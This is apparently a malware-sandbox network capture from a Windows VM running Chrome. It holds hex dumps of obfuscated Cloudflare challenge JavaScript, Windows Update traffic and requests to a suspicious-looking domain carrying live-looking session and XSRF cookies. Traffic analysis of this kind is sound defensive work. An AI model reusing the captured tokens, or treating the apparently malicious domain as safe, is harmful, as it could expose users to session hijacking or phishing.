                                                                                                                                          2024-11-18 05:47:27 UTC1369INData Raw: 7d 2c 27 58 76 48 4e 56 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 2a 68 7d 2c 27 66 58 51 42 64 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 62 70 51 54 73 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 2a 68 7d 2c 27 4b 6f 6e 4b 6e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 6a 55 57 6e 79 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 2c 27 48 56 78 7a 53 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 7d 2c 65 3d 53 74 72 69 6e 67 5b 6a 44 28 31 36 32 36 29 5d 2c 66 3d 7b 27 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 6a 45 29 7b 72 65 74 75 72 6e
                                                                                                                                          Data Ascii: },'XvHNV':function(h,i){return i*h},'fXQBd':function(h,i){return h<i},'bpQTs':function(h,i){return i*h},'KonKn':function(h,i){return i==h},'jUWny':function(h,i){return h+i},'HVxzS':function(h,i){return h+i}},e=String[jD(1626)],f={'h':function(h,jE){return
                                                                                                                                          2024-11-18 05:47:27 UTC1369INData Raw: 53 74 72 69 6e 67 28 4b 29 29 7d 7d 65 6c 73 65 20 47 3d 28 46 28 29 2c 30 29 3b 69 66 28 64 5b 6a 47 28 35 34 39 29 5d 28 27 27 2c 43 29 29 7b 69 66 28 4f 62 6a 65 63 74 5b 6a 47 28 31 37 36 29 5d 5b 6a 47 28 39 39 34 29 5d 5b 6a 47 28 31 32 33 37 29 5d 28 42 2c 43 29 29 7b 69 66 28 32 35 36 3e 43 5b 6a 47 28 34 34 36 29 5d 28 30 29 29 7b 66 6f 72 28 73 3d 30 3b 64 5b 6a 47 28 38 35 31 29 5d 28 73 2c 46 29 3b 48 3c 3c 3d 31 2c 49 3d 3d 6a 2d 31 3f 28 49 3d 30 2c 47 5b 6a 47 28 38 33 39 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 6a 47 28 34 34 36 29 5d 28 30 29 2c 73 3d 30 3b 38 3e 73 3b 48 3d 48 3c 3c 31 7c 64 5b 6a 47 28 31 34 36 34 29 5d 28 4d 2c 31 29 2c 49 3d 3d 64 5b 6a 47 28 38 39 35 29 5d 28 6a 2c
                                                                                                                                          Data Ascii: String(K))}}else G=(F(),0);if(d[jG(549)]('',C)){if(Object[jG(176)][jG(994)][jG(1237)](B,C)){if(256>C[jG(446)](0)){for(s=0;d[jG(851)](s,F);H<<=1,I==j-1?(I=0,G[jG(839)](o(H)),H=0):I++,s++);for(M=C[jG(446)](0),s=0;8>s;H=H<<1|d[jG(1464)](M,1),I==d[jG(895)](j,


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          14192.168.2.1655130104.18.94.414436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:27 UTC742OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ds4t7/0x4AAAAAAAz8LupiazIQW55I/auto/fbE/normal/auto/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:27 UTC240INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:27 GMT
                                                                                                                                          Content-Type: image/png
                                                                                                                                          Content-Length: 61
                                                                                                                                          Connection: close
                                                                                                                                          cache-control: max-age=2629800, public
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e45aa77e96e4778-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          2024-11-18 05:47:27 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                          Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          15192.168.2.1649711188.114.96.34436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:27 UTC1333OUTGET /favicon.ico HTTP/1.1
                                                                                                                                          Host: supernova.hethantac.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                          Referer: https://supernova.hethantac.com/3XdZQxT/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6InRDVEZMSUZOSzE0SEtNOURweW9vSXc9PSIsInZhbHVlIjoiaUVNTlpLbVRzNXFtdnk5UU5KbmhwaGhlVVR2VTI0OEF1V2NoTyt6YmlVajhFZzlkSVlKOHEzUTNic1BtWnJHWk9zdlJyME92bm5wMUsyM3BZMmtlMnJLcVgyQUc2OUZZN1plSm1WdkRpdjRkREdXVkVnZ0lKNFFSREFJeU5wd0kiLCJtYWMiOiJkODdjYWQxZTA3YmE5Mjk2YzU4ZDEwOTViZTdkZmFiNDRjMTMyMWFmYWZkZWFjOTRlMzRmNWMxNWQ2MGRiZGY3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImpHNzVIUzUrSFNrYWNJTHpqaUJUZGc9PSIsInZhbHVlIjoiZjdLQ3pCOTgzd3J0SE5nRWYyb1R0KzI3cm1nczdnaEhGWnBYcVpGcEEwdHFnYS9lcUlaUnJsejdDWmhtb0ZCSDRiN2VjbnBxaWJscDZtOExPOTJBOXZEMXNqOWdyT2pPbnBhUE1lYmM0MTM4Y2QxU080Q1BqbnZ6Z29wS2Q3Q3YiLCJtYWMiOiI3OTA1NzcyYzEyZTQ2NTE0ZmM4NDZjYTA0ZGI3MmYzNjQ3MWY2NjA2NWIwNzUxZTYyNTlmYTFmNGU5NjViMjcxIiwidGFnIjoiIn0%3D
                                                                                                                                          2024-11-18 05:47:27 UTC1015INHTTP/1.1 404 Not Found
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:27 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: max-age=14400
                                                                                                                                          Age: 5110
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vNF3VZu5q7fgnedemQfg16x%2Fy1s3RtlC8xfOQLUEEY6393on1iQYnZSF924SxtfPPQkJr8OxQQM32MUU3UP8kF9XSf6skODokXPrk9ROO3OhGaNLAK4l9R%2FeMqEMXA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=255&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2178&delivery_rate=12376068&cwnd=251&unsent_bytes=0&cid=e572fb0326957bd4&ts=34&x=0"
                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e45aa7a79c8e993-DFW
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1967&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1911&delivery_rate=1428007&cwnd=249&unsent_bytes=0&cid=49b9e42d1c99c6cd&ts=4722&x=0"
                                                                                                                                          2024-11-18 05:47:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          16192.168.2.1655132104.18.94.414436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:28 UTC385OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:28 UTC240INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:28 GMT
                                                                                                                                          Content-Type: image/png
                                                                                                                                          Content-Length: 61
                                                                                                                                          Connection: close
                                                                                                                                          cache-control: max-age=2629800, public
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e45aa7c9fb22cd2-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          2024-11-18 05:47:28 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                          Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          17192.168.2.165513120.12.23.50443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:28 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=dwUofH8SZLFcSGV&MD=BxftRVnd HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                          Host: slscr.update.microsoft.com
                                                                                                                                          2024-11-18 05:47:28 UTC560INHTTP/1.1 200 OK
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                          Expires: -1
                                                                                                                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                          ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                          MS-CorrelationId: 802a9815-f5ed-48fd-a23f-215080d99fc2
                                                                                                                                          MS-RequestId: 49077f21-200d-4606-901a-5baa5983a4db
                                                                                                                                          MS-CV: 6zYrOeLkzUSt7fxJ.0
                                                                                                                                          X-Microsoft-SLSClientCache: 2880
                                                                                                                                          Content-Disposition: attachment; filename=environment.cab
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:27 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Length: 24490
                                                                                                                                          2024-11-18 05:47:28 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                          Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                          2024-11-18 05:47:28 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                          Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          18192.168.2.1655133104.18.94.414436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:28 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8e45aa726acf4857&lang=auto HTTP/1.1
                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:28 UTC331INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:28 GMT
                                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                                          Content-Length: 117405
                                                                                                                                          Connection: close
                                                                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e45aa7e4db06bec-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          2024-11-18 05:47:28 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 48 50 55 62 6a 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74
                                                                                                                                          Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.HPUbj2={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"htt
                                                                                                                                          2024-11-18 05:47:28 UTC1369INData Raw: 65 5f 66 65 65 64 62 61 63 6b 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 65 6e 64 25 32 30 46 65 65 64 62 61 63 6b 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 72 65 66 72 65 73 68 22 3a 22 52 65 66 72 65 73 68 22 2c 22 6e 6f 74 5f 65 6d 62 65 64 64 65 64 22 3a 22 54 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 6d 75 73 74 25 32 30 62 65 25 32 30 65 6d 62 65 64 64 65 64 25 32 30 69 6e 74 6f 25 32 30 61 25 32 30 70 61 72 65 6e 74 25 32 30 70 61 67 65 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 70 72 69 76 61 63 79 22 3a 22 50 72 69 76 61 63 79 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 74 69 6d 65 6f 75 74 22 3a 22 54 69 6d 65 64 25 32 30 6f 75 74 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 76 65 72 69 66 79 69 6e 67 22 3a 22 56 65 72 69
                                                                                                                                          Data Ascii: e_feedback_description":"Send%20Feedback","turnstile_refresh":"Refresh","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","turnstile_footer_privacy":"Privacy","turnstile_timeout":"Timed%20out","turnstile_verifying":"Veri
                                                                                                                                          2024-11-18 05:47:28 UTC1369INData Raw: 4b 28 38 33 31 29 29 2f 36 2a 28 70 61 72 73 65 49 6e 74 28 67 4b 28 34 34 34 29 29 2f 37 29 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 31 35 31 37 29 29 2f 38 2b 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 31 38 35 31 29 29 2f 39 2b 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 31 31 37 30 29 29 2f 31 30 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 36 37 32 29 29 2f 31 31 29 2c 66 3d 3d 3d 64 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 31 32 38 37 31 31 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 4c 28 35 34 32 29 5d 2c 65 4f 3d 7b 7d 2c 65 4f 5b 67 4c 28 31 35 36 32 29 5d 3d 27 6f 27 2c 65 4f 5b 67 4c 28 31
                                                                                                                                          Data Ascii: K(831))/6*(parseInt(gK(444))/7)+parseInt(gK(1517))/8+-parseInt(gK(1851))/9+-parseInt(gK(1170))/10*(-parseInt(gK(672))/11),f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,128711),eM=this||self,eN=eM[gL(542)],eO={},eO[gL(1562)]='o',eO[gL(1
                                                                                                                                          2024-11-18 05:47:28 UTC1369INData Raw: 5b 67 4c 28 38 39 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 69 2c 67 53 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 29 7b 66 6f 72 28 67 53 3d 67 4c 2c 6a 3d 7b 7d 2c 6a 5b 67 53 28 36 32 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 73 3c 76 7d 2c 6a 5b 67 53 28 31 35 37 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 73 3d 3d 3d 76 7d 2c 6a 5b 67 53 28 31 32 35 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 73 3c 76 7d 2c 6b 3d 6a 2c 6c 3d 4f 62 6a 65 63 74 5b 67 53 28 31 35 36 38 29 5d 28 69 29 2c 6d 3d 30 3b 6b 5b 67 53 28 36 32 36 29 5d 28 6d 2c 6c 5b 67 53 28 31 33 39 30 29 5d 29 3b 6d 2b 2b 29 69 66 28 6e 3d 6c 5b 6d 5d 2c 6b 5b 67 53 28 31 35 37 35 29 5d 28 27 66 27 2c
                                                                                                                                          Data Ascii: [gL(894)]=function(h,i,gS,j,k,l,m,n,o){for(gS=gL,j={},j[gS(626)]=function(s,v){return s<v},j[gS(1575)]=function(s,v){return s===v},j[gS(1257)]=function(s,v){return s<v},k=j,l=Object[gS(1568)](i),m=0;k[gS(626)](m,l[gS(1390)]);m++)if(n=l[m],k[gS(1575)]('f',
                                                                                                                                          2024-11-18 05:47:28 UTC1369INData Raw: 62 28 31 32 37 31 29 5d 28 32 3c 3c 66 2c 33 32 29 2c 65 4d 5b 69 62 28 36 35 36 29 5d 28 66 75 6e 63 74 69 6f 6e 28 69 63 29 7b 69 63 3d 69 62 2c 65 4d 5b 65 5b 69 63 28 39 38 38 29 5d 5d 26 26 28 65 4d 5b 69 63 28 31 34 33 31 29 5d 5b 69 63 28 37 36 31 29 5d 28 29 2c 65 4d 5b 69 63 28 31 34 33 31 29 5d 5b 69 63 28 31 30 39 37 29 5d 28 29 2c 65 4d 5b 69 63 28 31 31 37 36 29 5d 3d 21 21 5b 5d 2c 65 4d 5b 65 5b 69 63 28 39 38 38 29 5d 5d 5b 69 63 28 31 38 37 30 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 69 63 28 31 34 38 37 29 2c 27 77 69 64 67 65 74 49 64 27 3a 65 4d 5b 69 63 28 35 31 39 29 5d 5b 69 63 28 39 37 36 29 5d 2c 27 65 76 65 6e 74 27 3a 69 63 28 31 32 35 34 29 2c 27 63 66 43 68 6c 4f 75 74 27 3a 65 4d 5b 69 63 28 35 31 39 29 5d 5b 69 63 28 31 34 37
                                                                                                                                          Data Ascii: b(1271)](2<<f,32),eM[ib(656)](function(ic){ic=ib,eM[e[ic(988)]]&&(eM[ic(1431)][ic(761)](),eM[ic(1431)][ic(1097)](),eM[ic(1176)]=!![],eM[e[ic(988)]][ic(1870)]({'source':ic(1487),'widgetId':eM[ic(519)][ic(976)],'event':ic(1254),'cfChlOut':eM[ic(519)][ic(147
                                                                                                                                          2024-11-18 05:47:28 UTC1369INData Raw: 35 31 39 29 5d 2e 63 48 29 2c 27 2f 27 29 2b 65 4d 5b 69 64 28 35 31 39 29 5d 5b 69 64 28 31 35 37 37 29 5d 2c 73 3d 7b 7d 2c 73 5b 69 64 28 37 39 35 29 5d 3d 65 4d 5b 69 64 28 35 31 39 29 5d 5b 69 64 28 37 39 35 29 5d 2c 73 5b 69 64 28 31 37 30 32 29 5d 3d 65 4d 5b 69 64 28 35 31 39 29 5d 5b 69 64 28 31 37 30 32 29 5d 2c 73 5b 69 64 28 31 36 33 34 29 5d 3d 65 4d 5b 69 64 28 35 31 39 29 5d 5b 69 64 28 31 36 33 34 29 5d 2c 73 5b 69 64 28 31 36 30 32 29 5d 3d 65 4d 5b 69 64 28 35 31 39 29 5d 5b 69 64 28 31 30 33 35 29 5d 2c 78 3d 73 2c 42 3d 6e 65 77 20 65 4d 5b 28 69 64 28 31 32 36 32 29 29 5d 28 29 2c 21 42 29 72 65 74 75 72 6e 3b 43 3d 69 64 28 38 33 30 29 2c 42 5b 69 64 28 31 35 31 31 29 5d 28 43 2c 6f 2c 21 21 5b 5d 29 2c 42 5b 69 64 28 39 30 32 29 5d
                                                                                                                                          Data Ascii: 519)].cH),'/')+eM[id(519)][id(1577)],s={},s[id(795)]=eM[id(519)][id(795)],s[id(1702)]=eM[id(519)][id(1702)],s[id(1634)]=eM[id(519)][id(1634)],s[id(1602)]=eM[id(519)][id(1035)],x=s,B=new eM[(id(1262))](),!B)return;C=id(830),B[id(1511)](C,o,!![]),B[id(902)]
                                                                                                                                          2024-11-18 05:47:28 UTC1369INData Raw: 5b 69 65 28 31 35 36 30 29 5d 21 3d 3d 69 65 28 38 34 32 29 29 6b 3d 2f 5e 5c 73 2a 61 74 5c 73 2b 28 2e 2b 29 3a 28 5c 64 2b 29 3a 28 5c 64 2b 29 2f 2c 6c 3d 6a 5b 31 5d 5b 69 65 28 31 30 33 30 29 5d 28 6b 29 2c 6c 26 26 28 65 5b 69 65 28 31 32 31 35 29 5d 28 69 65 28 31 38 33 36 29 2c 65 5b 69 65 28 31 37 35 36 29 5d 29 3f 65 5b 69 65 28 35 31 39 29 5d 5b 69 65 28 31 34 37 34 29 5d 3d 66 3a 28 67 3d 6c 5b 31 5d 2c 68 3d 70 61 72 73 65 49 6e 74 28 6c 5b 32 5d 2c 31 30 29 2c 69 3d 65 5b 69 65 28 38 33 39 29 5d 28 70 61 72 73 65 49 6e 74 2c 6c 5b 33 5d 2c 31 30 29 29 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 76 6f 69 64 28 65 5b 69 65 28 31 35 38 38 29 5d 28 65 2c 65 5b 69 65 28 36 32 33 29 5d 29 2c 66 28 29 29 7d 7d 65 6c 73 65 20 66 3d 4a 53 4f 4e 5b 69
                                                                                                                                          Data Ascii: [ie(1560)]!==ie(842))k=/^\s*at\s+(.+):(\d+):(\d+)/,l=j[1][ie(1030)](k),l&&(e[ie(1215)](ie(1836),e[ie(1756)])?e[ie(519)][ie(1474)]=f:(g=l[1],h=parseInt(l[2],10),i=e[ie(839)](parseInt,l[3],10)));else return void(e[ie(1588)](e,e[ie(623)]),f())}}else f=JSON[i
